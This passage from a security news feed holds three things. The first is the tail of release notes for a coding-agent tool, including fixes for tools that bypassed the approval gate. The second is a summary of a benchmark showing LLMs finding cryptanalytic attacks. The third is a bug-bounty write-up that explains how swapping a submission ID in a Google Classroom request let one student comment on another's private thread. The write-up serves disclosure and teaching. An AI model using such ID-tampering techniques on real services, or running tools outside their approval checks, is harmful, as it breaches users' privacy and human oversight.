<li>Fixed <code>pi_ls</code> never reporting that a listing was clipped. The bridge read the entry cap from a flat <code>details.resultLimitReached</code>, which <code>glob</code> sets but <code>read</code> — the tool serving <code>pi_ls</code> — does not: it records the cap through <code>OutputMeta</code> at <code>details.meta.limits.resultLimit.reached</code>. Every capped listing therefore reached Cursor with <code>entry_limit_reached</code> unset, reading as complete. Both shapes are now checked, the same way the truncation translation already handles its two producers.</li>
<li>Fixed a mixed-content MCP resource read reaching Cursor mislabelled. The mime type was taken from the first content item while the payload came from whichever item supplied it, so an image blob followed by a text note sent the text as <code>image/png</code>. Each branch now reports the type of the part it actually sends.</li>
<li>Fixed <code>pi_read</code>'s <code>offset</code>/<code>limit</code> returning more lines than the frame asked for. The range is composed onto the local <code>read</code> tool's inline selector, and a plain <code>:N+K</code> deliberately pads with one leading and three trailing context lines — helpful when a human reads a snippet, wrong for a caller that named an exact range: offset 5/limit 20 handed Cursor lines 4-27. Ranged Pi reads now compose <code>:raw:N+K</code>, which slices exactly the requested lines.</li>
<li>Fixed <code>pi_grep</code> returning fewer matches than it asked for when they spread across many files. The local <code>grep</code> windows results to the first 20 files and tells the caller to paginate with <code>skip</code>, but <code>PiGrepExecArgs</code> has no <code>skip</code> field — so a frame asking for 100 matches over 25 one-match files got 20, <code>match_limit_reached</code> unset, and advice it could not act on: output silently short and labelled complete. A search carrying a total match cap now reads enough files to satisfy it (cap+1, so a result landing exactly on the cap is distinguishable from a clipped one) and reports the cap when it actually bites.</li>
<li>Fixed every native <code>pi_edit</code> failing after a session switched onto Cursor. The replace-mode <code>edit</code> instance the frame needs was built only for sessions <em>created</em> on Cursor, and the tool roster is not rebuilt on a model switch — so a session that started elsewhere kept its configured-mode <code>edit</code> in the registry, which the bridge resolves before its fallback, and the frame's <code>old_text</code>/<code>new_text</code> pairs failed validation against a <code>hashline</code> schema. The instance is now built from the <code>edit</code> grant regardless of the session's initial provider (lazily, so a session that never reaches Cursor never constructs one) and <code>pi_edit</code> asks for it explicitly through a dedicated accessor. A session that was never granted <code>edit</code> is still refused.</li>
<li>Fixed the Cursor bridge's tool resolver being able to execute an unadvertised <code>edit</code>. That resolver doubles as the agent loop's fallback for any call outside the advertised set, so serving <code>edit</code> from it meant a hallucinated call — or one naming a tool the session deselected after startup — could run a replace-mode edit the model was never offered. It is device-only again; <code>pi_edit</code> uses its own accessor.</li>
<li>Fixed the legacy Cursor <code>read</code> frame ignoring the <code>offset</code>/<code>limit</code> modern builds paginate with. Only the Pi variant composed a range, so every page of a legacy read returned the whole file (or its own truncation) and a model walking a large file never advanced past the first window. Both frames now translate a range through the same helper, and the answer sets <code>range_applied</code> to describe whether a window was actually composed.</li>
<li>Fixed the legacy Cursor <code>grep</code> frame ignoring its pagination <code>offset</code>. The local <code>grep</code> paginates by file through <code>skip</code> and advertises exactly that in its own "use skip=N" advice, so an unforwarded offset re-ran the identical search and answered page one for every page. The answer now reports the offset it applied in <code>offset_applied</code>.</li>
<li>Fixed a paginated Cursor <code>read</code> or <code>grep</code> frame being recorded as an unpaginated one. The executed call and the transcript block are built separately, so forwarding the frame's range and page fixed only the execution: the block still showed a bare path and an unskipped search, which is what a reloaded session replays and what the next turn reasons from — a slice of a file presented as the whole thing, and results from a later window presented as page one. Both are now synthesized from the same translation that runs them, including a <code>limit: 0</code> read, which is recorded as the zero lines it returns rather than a whole-file read.</li>
<li>Fixed Cursor advisors answering every MCP resource frame as though the client hosted no servers. Only the primary bridge received the <code>MCPManager</code>-backed resource adapter, so an advisor's <code>list_mcp_resources</code> reported an empty catalog and its <code>read_mcp_resource</code> a <code>not_found</code> even though the advisor shares the session's live connections. Advisors now receive the same adapter; it is not gated on a tool grant, since reading what a server advertises is a different permission from calling one of its tools.</li>
<li>Fixed advisor tools bypassing the approval gate. They are built straight from the builtin table, outside the loop that wraps every registry tool, and both the advisor's own agent loop and its Cursor exec bridge (<code>pi_write</code>, <code>pi_bash</code>) run those instances directly — so an advisor granted <code>write</code> or <code>bash</code> executed them regardless of a configured <code>ask</code> or <code>deny</code>. They now carry the same <code>ExtensionToolWrapper</code> as every other tool.</li>
<li>Added <code>mcp_notification</code> extension event and multi-listener <code>MCPManager.addNotificationListener</code> API. The runtime already received MCP server-initiated JSON-RPC notifications at the transport layer but had no path to forward them to extensions; every notification (including server-custom methods) is now delivered as <code>{ server, method, params }</code> after the manager's own list/update handling. For known list-change methods (<code>notifications/tools/list_changed</code>, <code>notifications/resources/list_changed</code>, <code>notifications/prompts/list_changed</code>) the internal refresh promise is awaited before fanout, so a listener acting on <code>tools/list_changed</code> sees fresh <code>getTools()</code>. Notifications received before any listener attaches are buffered (bounded FIFO, cap 100, drop-oldest — matches <code>IrcBus</code>'s <code>MAILBOX_CAP</code>) and drained into the first subscriber, so startup-time frames aren't lost even if the extension binds after MCP discovery. Extensions can use this to bridge push-capable MCP servers (e.g. peer messaging) into session behavior by injecting a mid-turn steer via <code>pi.sendMessage</code> / <code>pi.sendUserMessage</code>.</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the dangling <code>MCPManager.setOnNotification</code> single-slot setter, which had no callers in the runtime. Replaced by <code>MCPManager.addNotificationListener</code> — multi-listener, per-listener error isolation, returns an unsubscribe function.</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where the agent would stop silently without a message by ensuring terminal auto-retry failures are properly surfaced as error notices.</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed <code>DEL</code>, <code>DEL.BLK</code>, <code>COPY</code>, and <code>COPY.BLK</code> from the patch language. Use <code>CUT</code> / <code>CUT.BLK</code> for deletion; a cut does not require a following <code>PASTE</code> and leaves the removed content available to later pastes.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added clipboard ops: <code>CUT N.=M</code> captures lines into a register (and deletes them), <code>CUT.BLK N</code> captures tree-sitter blocks, and <code>PASTE.PRE|POST N</code> / <code>PASTE.HEAD|TAIL</code> / <code>PASTE.BLK.POST N</code> insert the captured lines without retyping. The register flows top-to-bottom across sections, so content moves between files in one patch; <code>PASTE</code> does not consume it and the last capture wins.</li>
<li>Added <code>PatcherOptions.clipboard</code> for a host-owned register that persists across <code>Patcher.apply</code> batches. Batches work on a fork (<code>forkClipboard</code>) published per landed section (<code>commitClipboard</code>), so failed batches never poison the register and a mid-batch write failure still preserves content already cut from disk.</li>
<li>Added clipboard safety guards: a <code>PASTE</code> with an empty register, a capture overwriting un-pasted <code>CUT</code> content, and clipboard ops in same-path sections interleaved across another file's section are all rejected with targeted diagnostics. <code>CUT</code> ranges participate in overlap validation, the seen-lines guard, and drift recovery (every captured line must remap).</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Simplified <code>grammar.lark</code> around shared target and position shapes, collapsing the concrete and block <code>CUT</code> forms plus the <code>INS</code> / <code>PASTE</code> position variants into their common grammar rules.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Prevented CPU and memory exhaustion in streaming previews by rejecting line anchors above Number.MAX_SAFE_INTEGER and ranges spanning more than 100,000 lines.</li>
<li>Fixed an issue where recorded snapshot tags desynced from disk when the filesystem transformed content on write (e.g., auto-formatting on save), which previously caused subsequent edits to incorrectly reformat unrelated parts of the file. <code>Patcher.commit</code> now correctly keys the returned file hash and snapshot on the actual content written to disk and issues a warning when a drift is detected.</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Changed</h3>
<ul>
<li>Split the native voice engine (miniaudio capture/playback, WebRTC peer, Opus media) out of the <code>pi-natives</code> addon crate into a napi-free <code>pi-voice</code> rlib. The addon keeps thin <code>#[napi]</code> adapters, so the JS API is unchanged; the webrtc/opus/miniaudio dependency graph now compiles once into the library and no longer rebuilds with the addon leaf (which recompiles every release via its version-sentinel edit).</li>
<li>Release binaries now build in parallel with the test fan-out; npm leaf publishing moved to a dedicated post-validation job (<code>release_native_leaves</code>), and darwin release bazel caches are pre-warmed on native-affecting main pushes — cutting release wall time from the previous serialized tests → cold darwin build pipeline.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added response-level OSC 11 appearance subscriptions to help terminal consumers distinguish confirmed unchanged background classifications from missing replies.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed native Windows terminal panes freezing their host during forced closure by skipping the stdout-drain wait after ConPTY disconnects.</li>
<li>Fixed high CPU usage in the Loader spinner during idle waits by optimizing text wrapping and caching during frame updates.</li>
<li>Fixed hash-prefixed UUIDs in prose being misclassified as 8-digit CSS colors and receiving spurious swatches.</li>
<li>Fixed unbounded memory growth and potential host freezes when a PTY consumer stalls by capping the pending stdout backlog and treating undrained consumers as a disconnect.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>feat(coding-agent): autocomplete MCP server names in /mcp subcommands by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mathews-Tom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mathews-Tom">@Mathews-Tom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4964038235" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6454" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6454/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6454">#6454</a></li>
<li>fix(tui): bound stdout backlog when the pty consumer stalls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4994881362" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6856" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6856/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6856">#6856</a></li>
<li>fix(coding-agent): scope Advisor cost to the active session by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paolomazzitti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paolomazzitti">@paolomazzitti</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4996798160" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6883" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6883/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6883">#6883</a></li>
<li>docs: clarify ttsr edit/write matcherDigest is introduced lines by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4997533930" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6886" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6886/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6886">#6886</a></li>
<li>fix(ttsr): flag text-source inference for unlisted file extensions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4997597220" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6888" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6888/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6888">#6888</a></li>
<li>fix: forward parseArgs and CONFIG_DIR_NAME from the legacy pi shim by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gy-Hu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gy-Hu">@Gy-Hu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4999557428" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6907" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6907/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6907">#6907</a></li>
<li>feat(mcp): expose server-initiated notifications to extensions via mcp_notification event by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asteriskSF/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asteriskSF">@asteriskSF</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4970878648" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6535" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6535/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6535">#6535</a></li>
<li>feat(ai): add xAI API key login by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paralin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paralin">@paralin</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4977761531" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6647" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6647/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6647">#6647</a></li>
<li>feat(coding-agent): add opt-in max ceiling for auto thinking by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everton-dgn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everton-dgn">@everton-dgn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4979453514" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6680" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6680/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6680">#6680</a></li>
<li>feat: add opt-in Codex reset fireworks by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshrzemien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshrzemien">@joshrzemien</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4994940233" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6858" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6858/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6858">#6858</a></li>
<li>feat(coding-agent): allow checkpoint/rewind/learn/manage_skill in subagents when explicitly requested by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/szavadsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/szavadsky">@szavadsky</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5003316625" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6938" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6938/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6938">#6938</a></li>
<li>feat(extensions): expose session async job snapshots by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/usr-bin-roygbiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/usr-bin-roygbiv">@usr-bin-roygbiv</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5003718821" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6939" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6939/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6939">#6939</a></li>
<li>feat(tools): add a browser.cdpUrl setting for the default automation target by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/terrxo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/terrxo">@terrxo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5008085193" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7007" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7007/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7007">#7007</a></li>
<li>fix(ai): bound Anthropic retry-after waits by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/metaphorics/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/metaphorics">@metaphorics</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5010843656" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7028" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7028/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7028">#7028</a></li>
<li>feat(rpc): expose live fast-mode control and token throughput by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fredluz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fredluz">@fredluz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5012492284" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7036" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7036/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7036">#7036</a></li>
<li>Umans usage provider by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hpost/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hpost">@hpost</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806862967" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4484" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4484/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4484">#4484</a></li>
<li>feat(ai): add Exa API key login by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/will-bogusz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/will-bogusz">@will-bogusz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4978125728" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6652" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6652/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6652">#6652</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gy-Hu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gy-Hu">@Gy-Hu</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4999557428" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6907" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6907/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6907">#6907</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asteriskSF/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asteriskSF">@asteriskSF</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4970878648" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6535" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6535/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6535">#6535</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshrzemien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshrzemien">@joshrzemien</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4994940233" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6858" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6858/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6858">#6858</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/szavadsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/szavadsky">@szavadsky</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5003316625" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/6938" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/6938/hovercard" href="https://github.com/can1357/oh-my-pi/pull/6938">#6938</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/terrxo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/terrxo">@terrxo</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5008085193" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7007" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7007/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7007">#7007</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fredluz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fredluz">@fredluz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5012492284" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7036" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7036/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7036">#7036</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hpost/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hpost">@hpost</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806862967" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/4484" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/4484/hovercard" href="https://github.com/can1357/oh-my-pi/pull/4484">#4484</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v17.1.8...v17.2.0">v17.1.8...v17.2.0</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Measuring LLMs’ Ability to Perform Cryptanalysis]]></title>
<description><![CDATA[There’s new benchmark measuring AI’s ability to perform mathematical cryptanalysis. Anthropic’s frontier model actually found new attacks.
The benchmark: “CryptanalysisBench: Can LLMs do Cryptanalysis?” The idea is to benchmark the ability of LLMs to discover new mathematical cryptanalytic attack...]]></description>
<link>https://tsecurity.de/de/3698221/reverse-engineering/measuring-llms-ability-to-perform-cryptanalysis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698221/reverse-engineering/measuring-llms-ability-to-perform-cryptanalysis/</guid>
<pubDate>Mon, 03 Aug 2026 00:09:48 +0200</pubDate>
<content:encoded><![CDATA[<p>There’s new benchmark measuring AI’s ability to perform mathematical cryptanalysis. Anthropic’s frontier model actually found new attacks.</p>
<p>The benchmark: “<a href="https://arxiv.org/pdf/2607.18538">CryptanalysisBench: Can LLMs do Cryptanalysis?</a>” The idea is to benchmark the ability of LLMs to discover new mathematical cryptanalytic attacks against a series of historical algorithms.</p>
<blockquote><p><b>Abstract:</b> Cryptanalysis—the task of finding attacks against cryptographic schemes—its at the intersection of mathematical reasoning and cybersecurity, two areas where LLMs have advanced fastest. Cryptanalysis represents both a clean testbed for frontier reasoning (as practical attacks can be automatically verified) and a domain with unusually high stakes, since the primitives under study underpin our digital security. In this paper we ask whether LLMs can do cryptanalysis, and find that the answer is increasingly yes. We introduce CryptanalysisBench, 191 tasks across six families of cryptographic primitives (block ciphers, hash functions, etc.) drawn primarily from four NIST standardization competitions. Our benchmark consists of three tiers: (i) primitives with known practical breaks; (ii) primitives with no known practical break, evaluated both at full strength and as scaled-down variants; and (iii) a challenge set of production primitives at the frontier of cryptanalysis. Five frontier models (Claude Opus 4.8, Sonnet 5, Mythos 5, GPT-5.5, and the open-weights GLM-5.2) break 65%­86% of Tier 1 schemes, 6­12 Tier-2 schemes at full strength, and 24­61 across all scaled-down variants. Beyond deriving known results, models produce novel cryptanalysis, such as a key-recovery attack that exploits a design flaw in the SpoC AEAD and an error in KINDI’s published CCA-security proof, both to the best of our knowledge not previously known...</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I found an IDOR in Google Classroom on Day 3 of my Hunting?]]></title>
<description><![CDATA[Hello Guys,Hope you are well. This is my first writeup and I will tell you how I found IDOR on Google Classroom on Day 3 of my hunting on Google. I hope it will inspire you.I selected my first target as Google Classroom because I use it daily for my University Assignments and Tasks.So first, I st...]]></description>
<link>https://tsecurity.de/de/3698175/hacking/how-i-found-an-idor-in-google-classroom-on-day-3-of-my-hunting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698175/hacking/how-i-found-an-idor-in-google-classroom-on-day-3-of-my-hunting/</guid>
<pubDate>Mon, 03 Aug 2026 00:09:41 +0200</pubDate>
<content:encoded><![CDATA[<p>Hello Guys,</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/165/1*ArSTrnnngVR-hVEgD0PqwA.jpeg"></figure><p>Hope you are well. This is my first writeup and I will tell you how I found IDOR on Google Classroom on Day 3 of my hunting on Google. I hope it will inspire you.</p><p>I selected my first target as Google Classroom because I use it daily for my University Assignments and Tasks.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*Q2kjiK9KRuMyZL07ClREFQ.png"></figure><p>So first, I started testing every feature, and I noticed in Burp History that Google is using Batchexecute system with <strong><em>rpcids</em></strong> for every UI functionality.</p><p>The batchexecute system at <strong><em>classroom.google.com</em></strong> is Google's internal frontend RPC protocol and it’s completely undocumented.</p><p>The batchexecute system works like, every UI action in Classroom triggers a POST request to the batchexecute endpoint with a parameter called <strong><em>rpcids</em></strong> that identifies which internal method to call.</p><p>For example when you post a comment in Classroom your browser sends something like:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/644/1*uyHkKyaP38HwJG2ais41qg.jpeg"></figure><p>Then, I started mapping different UI functionalities with rpcids, for example:</p><p>ndas7c &gt; CREATE announcement<br>F7asdb &gt; UPDATE/EDIT announcement<br>tQbcjc &gt; READ/FETCH announcement<br>xxxxxx &gt; POST private comment on submission thread</p><p>These rpcids helped me map every Ui functionality.</p><p>After spending time mapping every RPC method in Classroom batchexecute system, most of my tests were coming back clean. Google’s auth on the obvious attack surfaces was solid. The well-known endpoints had proper authorization checks.</p><p>I was about to move on to a different target but I decided to look more carefully one last time at the private comment functionality on assignment submissions.</p><p>Private comments in Google Classroom are a specific feature designed for confidential communication between a student and their teacher about a particular assignment submission. When a student submits work they can leave private notes for the teacher and the teacher can respond. These comments are explicitly designed to be visible only to the submission owner and the teacher. No other student should be able to see or interact with that thread.</p><p>I gave it a try and said to myself that this is the last endpoint I will test on Classroom.</p><p>I had two test accounts set up, one acting as an attacker and one as a victim, both enrolled in the same course with submitted assignments. While intercepting traffic I started looking at the requests that fired when I posted a private comment on my own submission.</p><p>What caught my attention was the structure of the request. Like all batchexecute calls, it contained several ID parameters such as the course ID, the coursework ID, and crucially a submission ID that identified whose submission thread the comment was being posted to.</p><p>The question I asked myself was simple, what happens if I change that submission ID?</p><p>Then, I captured my second account same request and copied the submission ID.</p><p>I replaced my submission ID with the victim’s submission ID in the request, kept my own session cookies, and sent it.</p><p>The server returned 200 OK.</p><p>I opened the victim’s account and looked at their private submission thread. Yippee, my attacker comment was sitting there, visible to the victim and their teacher.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wtK-mAWIO0uvnEHNK9nFSw.png"><figcaption>Victim’s View</figcaption></figure><p>The authorization check wasn’t there for this particular RPC method. The server accepted the request, trusted the submission ID in the payload, and posted the comment without verifying that the commenter had any legitimate relationship to that submission.</p><p>Now, there was one thing I had to figure out that how to get the victim submission ID in a realistic scenario.</p><p>I started analyzing Burp History and found a response that was showing submission IDs of all students enrolled in the class. BOOM. I tested it again and found that on a specific endpoint, if you refresh the page and capture the request, you will see submission IDs of all students in the response.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*H8ekS4jClt9PnCn4s4dwCQ.jpeg"></figure><p>I verified the finding from the teacher’s account as well. The unauthorized comment appeared there too.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q7_VdyZpctUNe1fhZ82fnw.jpeg"><figcaption>Teacher’s View</figcaption></figure><p>I documented everything and submitted the report to Google VRP. Unfortunately, The report came back as a duplicate, but I was happy that I found a legitimate issue.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PHTx5tcXXyIroo8npPENZw.jpeg"></figure><p>Finding a real vulnerability in a Google product as someone still building their skills felt significant, even if it ended up being a duplicate. The whole process taught me more than I expected, not just about bug hunting but about how to think like a security researcher.</p><p>Thank you for reading. Hope you enjoy it and hope it inspire you.</p><p>Follow me on Linkedin: <a href="http://linkedin.com/in/marrij">linkedin.com/in/marrij</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/485/1*1PVGVelnp7CU2Pnk9IIjZw.jpeg"></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=abffd039406c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-found-an-idor-in-google-classroom-on-day-3-of-my-hunting-abffd039406c">How 